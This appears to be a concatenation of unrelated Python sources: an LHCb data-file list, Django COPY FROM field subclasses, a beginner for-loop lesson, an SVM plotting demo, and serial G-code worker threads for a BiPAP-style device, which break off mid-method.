'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066423_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038398_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024283_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019179_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000817_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032925_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020959_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028908_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016040_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064221_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018376_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064143_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031019_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052147_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000343_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015235_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031587_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010385_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054584_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057184_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056156_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060448_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006107_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048524_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046471_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063801_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000416_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063502_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030665_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068065_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062557_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014917_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009418_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001193_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007189_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050163_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067732_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025247_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047294_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014349_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024801_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058209_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022126_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025914_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002824_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027710_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051186_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046345_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048957_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018673_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020271_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013783_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005382_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011752_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052141_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003907_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042729_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013479_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028163_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053313_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051174_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019796_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008252_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037232_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010811_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060962_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036734_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009287_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025894_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029613_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023693_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035135_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029966_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032894_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059881_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016883_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011829_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064462_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066582_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068872_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025455_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049257_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000387_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045183_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003410_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005985_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015015_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034527_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019941_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036219_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067037_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028526_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038072_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056907_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024101_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051574_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039660_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008676_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044369_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025749_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045999_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024480_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054921_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021129_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005011_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036989_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040710_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043305_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001618_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060298_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023258_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020762_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038139_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030879_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009421_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054303_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014072_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058913_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055589_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027896_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043486_1.semileptonic.dst',
], clear=True)
|
python
|
"""
Customized Django model field subclasses
"""
from django.db import models
from django.db.models import fields
from django.db.models.fields.related import ManyToManyField
class CopyFromFieldMixin(fields.Field):
    """Mixin that lets a model field name its column in a COPY FROM command.

    Accepts one extra keyword argument, ``source_column``: the name of the
    column in the source data. When it is not given (or is falsy), the
    field's own database column name is used instead.
    """

    def __init__(self, *args, **kwargs):
        # Strip our extra kwarg before Django's Field.__init__ sees it,
        # since Field rejects unknown keyword arguments.
        self.source_column = kwargs.pop('source_column', None)
        super().__init__(*args, **kwargs)

    @property
    def copy_from_name(self):
        """Column name to reference in a COPY FROM command."""
        # Falsy source_column (None or '') falls back to the model column.
        return self.source_column or self.column
class CopyFromBigIntegerField(fields.BigIntegerField, CopyFromFieldMixin):
    """``BigIntegerField`` variant carrying COPY FROM column metadata."""
class CopyFromBooleanField(fields.BooleanField, CopyFromFieldMixin):
    """``BooleanField`` variant carrying COPY FROM column metadata."""
class CopyFromCharField(fields.CharField, CopyFromFieldMixin):
    """``CharField`` variant carrying COPY FROM column metadata."""
class CopyFromDateField(fields.DateField, CopyFromFieldMixin):
    """``DateField`` variant carrying COPY FROM column metadata."""
class CopyFromDateTimeField(fields.DateTimeField, CopyFromFieldMixin):
    """``DateTimeField`` variant carrying COPY FROM column metadata."""
class CopyFromDecimalField(fields.DecimalField, CopyFromFieldMixin):
    """``DecimalField`` variant carrying COPY FROM column metadata."""
class CopyFromEmailField(fields.EmailField, CopyFromFieldMixin):
    """``EmailField`` variant carrying COPY FROM column metadata."""
class CopyFromFloatField(fields.FloatField, CopyFromFieldMixin):
    """``FloatField`` variant carrying COPY FROM column metadata."""
class CopyFromForeignKey(models.ForeignKey, CopyFromFieldMixin):
    """``ForeignKey`` variant carrying COPY FROM column metadata."""
class CopyFromIntegerField(fields.IntegerField, CopyFromFieldMixin):
    """``IntegerField`` variant carrying COPY FROM column metadata."""
class CopyFromOneToOneField(models.OneToOneField, CopyFromFieldMixin):
    """``OneToOneField`` variant carrying COPY FROM column metadata."""
class CopyFromTextField(fields.TextField, CopyFromFieldMixin):
    """``TextField`` variant carrying COPY FROM column metadata."""
class CopyFromURLField(fields.URLField, CopyFromFieldMixin):
    """``URLField`` variant carrying COPY FROM column metadata."""
class CopyFromManyToManyField(ManyToManyField, CopyFromFieldMixin):
    """``ManyToManyField`` variant carrying COPY FROM column metadata."""
|
python
|
# Lesson: repetition structures driven by a control variable.

# A fixed number of iterations; the control variable itself is unused.
for _ in range(6):
    print('oi')
print('fim')

# range(start, stop, step): even numbers from 0 up to (but not including) 10.
for value in range(0, 10, 2):
    print(value)
print('fim')

# Another example: a negative step counts down from 10 to 1.
for value in range(10, 0, -1):
    print(value)
print('Fim')

# Read an upper bound from the user and count from 0 up to it, inclusive.
n = int(input('Numero: '))
for value in range(n + 1):
    print(value)
print('fim')

# Accumulate the sum of four numbers typed by the user.
total = 0
for _ in range(4):
    total = total + int(input('Digite um numero'))
print(total)
|
python
|
from __future__ import print_function
from matplotlib import rc
rc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})
## for Palatino and other serif fonts use:
#rc('font',**{'family':'serif','serif':['Palatino']})
#rc('text', usetex=True)
# generate data
# list of points
from matplotlib.backends.backend_pdf import PdfPages
import numpy as np
import matplotlib.pyplot as plt
from scipy.spatial.distance import cdist
np.random.seed(22)
means = [[2, 2], [4, 2]]
cov = [[.3, .2], [.2, .3]]
N = 10
X0 = np.random.multivariate_normal(means[0], cov, N)
X1 = np.random.multivariate_normal(means[1], cov, N)
X = np.concatenate((X0.T, X1.T), axis = 1)
y = np.concatenate((np.ones((1, N)), -1*np.ones((1, N))), axis = 1)
# plot points
plt.plot(X0[:, 0], X0[:, 1], 'bs', markersize = 8, alpha = .8)
plt.plot(X1[:, 0], X1[:, 1], 'ro', markersize = 8, alpha = .8)
plt.axis('equal')
# axis limits
plt.ylim(0, 3)
plt.xlim(2, 4)
# hide tikcs
cur_axes = plt.gca()
cur_axes.axes.get_xaxis().set_ticks([])
cur_axes.axes.get_yaxis().set_ticks([])
plt.xlabel('$x_1$', fontsize = 20)
plt.ylabel('$x_2$', fontsize = 20)
# pdf.savefig()
plt.show()
from cvxopt import matrix, solvers
# Solve the hard-margin SVM dual QP:
#   min 1/2 l^T K l - 1^T l   s.t.  l >= 0,  y^T l = 0
# build K
V = np.concatenate((X0.T, -X1.T), axis = 1)  # columns are y_i * x_i
K = matrix(V.T.dot(V))
p = matrix(-np.ones((2*N, 1)))
# build A, b, G, h
G = matrix(-np.eye(2*N))      # -l <= 0  (i.e. l >= 0)
h = matrix(np.zeros((2*N, 1)))
A = matrix(y)                 # equality constraint y^T l = 0
b = matrix(np.zeros((1, 1)))
solvers.options['show_progress'] = False
sol = solvers.qp(K, p, G, h, A, b)
l = np.array(sol['x'])        # dual variables (lambdas)
print('lambda = \n', l.T)
# support vectors: strictly positive lambdas (numerical threshold 1e-6)
S = np.where(l > 1e-6)[0]
VS = V[:, S]
XS = X[:, S]
yS = y[:, S]
lS = l[S]
# calculate w and b
w = VS.dot(lS)                # w = sum_i lambda_i y_i x_i
b = np.mean(yS.T - w.T.dot(XS))  # average of y_s - w^T x_s over support vectors
print('w = ', w.T)
print('b = ', b)
with PdfPages('svm4.pdf') as pdf:
    # draw
    # plot points
    fig, ax = plt.subplots()
    x1 = np.arange(-10, 10, 0.1)
    # decision boundary and the two margin lines (w^T x + b = 0, +-1)
    y1 = -w[0, 0]/w[1, 0]*x1 - b/w[1, 0]
    y2 = -w[0, 0]/w[1, 0]*x1 - (b-1)/w[1, 0]
    y3 = -w[0, 0]/w[1, 0]*x1 - (b+1)/w[1, 0]
    plt.plot(x1, y1, 'k', linewidth = 3)
    plt.plot(x1, y2, 'k')
    plt.plot(x1, y3, 'k')
    y4 = 10*x1
    plt.plot(x1, y1, 'k')
    # shade the two half-spaces on either side of the boundary
    plt.fill_between(x1, y1, color='red', alpha=0.1)
    plt.fill_between(x1, y1, y4, color = 'blue', alpha = 0.1)
    plt.plot(X0[:, 0], X0[:, 1], 'bs', markersize = 8, alpha = .8)
    plt.plot(X1[:, 0], X1[:, 1], 'ro', markersize = 8, alpha = .8)
    plt.axis('equal')
    plt.ylim(0, 3)
    plt.xlim(2, 4)
    # hide tikcs
    cur_axes = plt.gca()
    cur_axes.axes.get_xaxis().set_ticks([])
    cur_axes.axes.get_yaxis().set_ticks([])
    # add circles around support vectors
    for m in S:
        circle = plt.Circle((X[0, m], X[1, m] ), 0.1, color='k', fill = False)
        ax.add_artist(circle)
    plt.xlabel('$x_1$', fontsize = 20)
    plt.ylabel('$x_2$', fontsize = 20)
    # plt.savefig('svm4.png', bbox_inches='tight', dpi = 300)
    pdf.savefig()
    plt.show()
|
python
|
import sys
import serial
import pprint
import time
import enum
import queue
from queue import Queue
from os.path import join, dirname, abspath
from qtpy.QtCore import Slot, QTimer, QThread, Signal, QObject, Qt, QMutex
class GcodeStates(enum.Enum):
    """States of the G-code send/acknowledge cycle used by BipapThread.run()."""
    WAIT_FOR_TIMEOUT = 1  # command written; waiting out the fixed execution delay
    GCODE_SENT = 2        # not referenced in the visible code -- possibly legacy
    READY_TO_SEND = 3     # next G-code step may be written to the port
class BipapInitializationThread(QObject):
    """Worker that runs the BiPAP initialization G-code sweep over serial.

    Emits ``signal`` with "<gcode> - <reply>" progress strings,
    "Endbipapinit" when the pressure sweep ends (normally or on error inside
    the sweep), and "Stopped" on serial/unexpected errors. Emits ``ppsignal``
    with the collected [position, pressure] sample pairs.
    """
    signal = Signal(str)
    ppsignal = Signal(list)
    def __init__(self, serialPort, codegen, que):
        # que: queue of pressure readings (fed by SensorThread -- see its run())
        self.pressureque = que
        self.serialPort = serialPort
        # [position, pressure] pairs collected during the sweep
        self.position_pressure_list = []
        #self.json = JsonSettings("settings.json")
        self.codegen = codegen #GcodeGenerator(int(self.json.dict['vt']), int(self.json.dict['rr']), int(self.json.dict['ie']), int(self.json.dict['fio2']))
        self.codegen.GenerateCMV()
        # initialization G-code program, one command per entry
        self.codelist = self.codegen.gcodeinit.splitlines()
        self.flagStop = False
        # current sweep position; advances from Dt up to Dp
        self.variableDt = self.codegen.Dt
        self.ustr = ""
        super().__init__()
    def Stop(self):
        """Request the run() loop to stop at the next checkpoint."""
        self.flagStop = True
    @Slot()
    def run(self):
        """Send the init program, then sweep positions recording pressure."""
        try:
            lst = []
            for line in self.codelist:
                if self.flagStop:
                    break
                #self.serialPort.reset_input_buffer()
                self.serialPort.write((str(line) + "\r\n").encode("utf-8"))
                time.sleep(0.5)
                # block until the controller starts replying
                in_waiting = self.serialPort.in_waiting
                while in_waiting == 0:
                    time.sleep(1)
                    in_waiting = self.serialPort.in_waiting
                jMessage = ""
                while self.serialPort.in_waiting:
                    #print(self.serialPort.readline().decode('ascii'))
                    lst = self.serialPort.readlines()
                    for itm in lst:
                        try:
                            jMessage += itm.decode('ascii')
                        except:
                            pass
                    #jMessage += self.serialPort.readline().decode('ascii')
                if "busy" in jMessage:
                    time.sleep(1)
                    continue
                self.signal.emit(str(line) + " - " + jMessage)
            # pressure sweep: step X/Y from Dt to Dp, sampling pressure at each step
            while self.variableDt < self.codegen.Dp:
                if self.flagStop:
                    break
                try:
                    self.ustr = "G01 X"+str(self.variableDt) + " Y"+str(self.variableDt)+"\r\n"
                    self.serialPort.write((self.ustr.encode("utf-8")))
                    # drain any stale pressure reading before sampling a new one
                    if self.pressureque.qsize() > 0:
                        self.pressureque.get(False)
                    time.sleep(0.12)
                    in_waiting = self.serialPort.in_waiting
                    #while in_waiting == 0:
                    #time.sleep(0.1)
                    #in_waiting = self.serialPort.in_waiting
                    #self.serialPort.reset_input_buffer()
                    # busy-wait for the next pressure sample from the sensor thread
                    while self.pressureque.qsize() <= 0:
                        pass
                    if self.pressureque.qsize() > 0:
                        pressure = self.pressureque.get(False)
                        # readings containing a newline are partial/garbled -- skip them
                        if "\n" in pressure:
                            pass
                        else:
                            self.position_pressure_list.append([self.variableDt, pressure])
                    self.variableDt += 1
                except serial.SerialException as ex:
                    print("Error In SerialException During Bipap Pushing" + str(ex.strerror))
                    self.signal.emit("Endbipapinit")
                except Exception as e:
                    print("Error In Exception During Bipap Pushing")
                    pprint.pprint(e)
                    self.signal.emit("Endbipapinit")
            # publish collected samples and return the mechanism to position Dt
            self.ppsignal.emit(self.position_pressure_list)
            self.ustr = "G01 X"+str(self.codegen.Dt) + " Y"+str(self.codegen.Dt)+"\r\n"
            self.serialPort.write((self.ustr.encode("utf-8")))
            pprint.pprint(self.position_pressure_list)
            print("pressure list from thread")
            self.signal.emit("Endbipapinit")
        except serial.SerialException as ex:
            print("Error In SerialException" + str(ex.strerror))
            self.signal.emit("Stopped")
        except Exception as e:
            print('Error From Bipap run..')
            pprint.pprint(e)
            self.signal.emit("Stopped")
class PrimaryThread(QObject):
    """Worker that streams the primary G-code program to the controller.

    Emits ``signal`` with "<gcode> - <reply>" after each acknowledged line,
    "StoppedOK" once the whole program has been sent, and "Stopped" on error.
    """
    signal = Signal(str)
    def __init__(self, serialPort, codegen):
        # serialPort: an open pyserial-like port shared with other workers
        self.serialPort = serialPort
        #self.json = JsonSettings("settings.json")
        self.codegen = codegen
        self.codegen.GenerateCMV()
        # primary G-code program, one command per entry
        self.codelist = self.codegen.gcodeprimary.splitlines()
        self.flagStop = False
        super().__init__()
    def Stop(self):
        """Request the run() loop to stop before the next line is sent."""
        self.flagStop = True
    @Slot()
    def run(self):
        """Send each G-code line and collect the controller's ascii reply.

        A reply containing 'busy' causes the line to be skipped after a
        short delay (original behaviour preserved -- no retry).
        """
        try:
            for line in self.codelist:
                if self.flagStop:
                    break
                #self.serialPort.reset_input_buffer()
                self.serialPort.write((str(line) + "\r\n").encode("utf-8"))
                time.sleep(0.5)
                # block until the controller starts replying
                in_waiting = self.serialPort.in_waiting
                while in_waiting == 0:
                    time.sleep(1)
                    in_waiting = self.serialPort.in_waiting
                jMessage = ""
                while self.serialPort.in_waiting:
                    for itm in self.serialPort.readlines():
                        try:
                            jMessage += itm.decode('ascii')
                        except UnicodeDecodeError:
                            pass  # drop undecodable noise bytes
                if "busy" in jMessage:
                    time.sleep(1)
                    continue
                self.signal.emit(str(line) + " - " + jMessage)
            self.signal.emit("StoppedOK")
        except serial.SerialException as ex:
            # BUG FIX: ex.strerror may be None; concatenating it directly
            # raised TypeError and masked the original serial error. Every
            # sibling class already uses str(ex.strerror).
            print("Error In SerialException" + str(ex.strerror))
            self.signal.emit("Stopped")
        except Exception as e:
            pprint.pprint(e)
            self.signal.emit("Stopped")
class BipapThread(QObject):
    """Worker that repeatedly steps the mechanism via timed G-code moves.

    A two-state machine (READY_TO_SEND / WAIT_FOR_TIMEOUT) paces one
    incremental move every ~0.15 s while ``pause`` is False.
    """
    signal = Signal(str)
    def __init__(self, serl, codegen, que):
        # que: pressure queue (not read in the visible code -- kept for callers)
        self.pressureque = que
        self.serl = serl
        self.codegen = codegen
        self.codegen.GenerateCMV()
        self.codelist = self.codegen.gcodestr.splitlines()
        self.linecount = len(self.codelist)
        self.flagStop = False
        # paused until StartMoving()/StartMovingAfter() is called
        self.pause = True
        self.gcode_exec_state = GcodeStates.READY_TO_SEND
        self.gcode_move_count = 0
        self.presentPosition = (0,0)
        self.Tic = 0
        self.Toc = 0
        # current X/Y step position; starts at Dt and is clamped at xmax
        self.xyIncr = self.codegen.Dt
        self.gstr = ""
        self.sremsg = ""
        # guards writes to the shared serial port
        self.serialmutex = QMutex()
        self.startdelay = -1
        super().__init__()
    def gcodestep(self):
        """Prepare the next incremental move command in ``gstr``."""
        self.gstr = "G01 X" + str(self.xyIncr) + " Y" + str(self.xyIncr) + " F1000\r\n"
        if self.xyIncr < self.codegen.xmax:
            self.xyIncr += 1
    def Stop(self):
        """Request the run() loop to exit."""
        self.flagStop = True
    def updateGcode(self, codegen):
        """Swap in a new generator and regenerate the command list."""
        self.codegen = codegen
        self.codegen.GenerateCMV()
        self.codelist = self.codegen.gcodestr.splitlines()
    def StartMoving(self):
        """Unpause immediately."""
        self.pause = False
    def StartMovingAfter(self, delay):
        """Unpause after ``delay`` seconds (handled inside run())."""
        self.startdelay = delay
    def StopMoving(self):
        """Pause and reset the step position back to Dt."""
        self.pause = True
        self.xyIncr = self.codegen.Dt
    @Slot()
    def run(self):
        lst = []
        while 1:
            if self.flagStop:
                break
            try:
                if not self.pause:
                    if self.gcode_exec_state == GcodeStates.READY_TO_SEND:
                        self.gcodestep()
                        self.serialmutex.lock()
                        self.serl.write(self.gstr.encode("utf-8"))
                        self.serialmutex.unlock()
                        self.gcode_move_count += 1
                        # every 130th move skips the wait state (counter reset only)
                        if self.gcode_move_count >= 130:
                            #self.pause = True
                            self.gcode_move_count = 0
                        else:
                            self.gcode_exec_state = GcodeStates.WAIT_FOR_TIMEOUT
                            self.Tic = time.perf_counter()
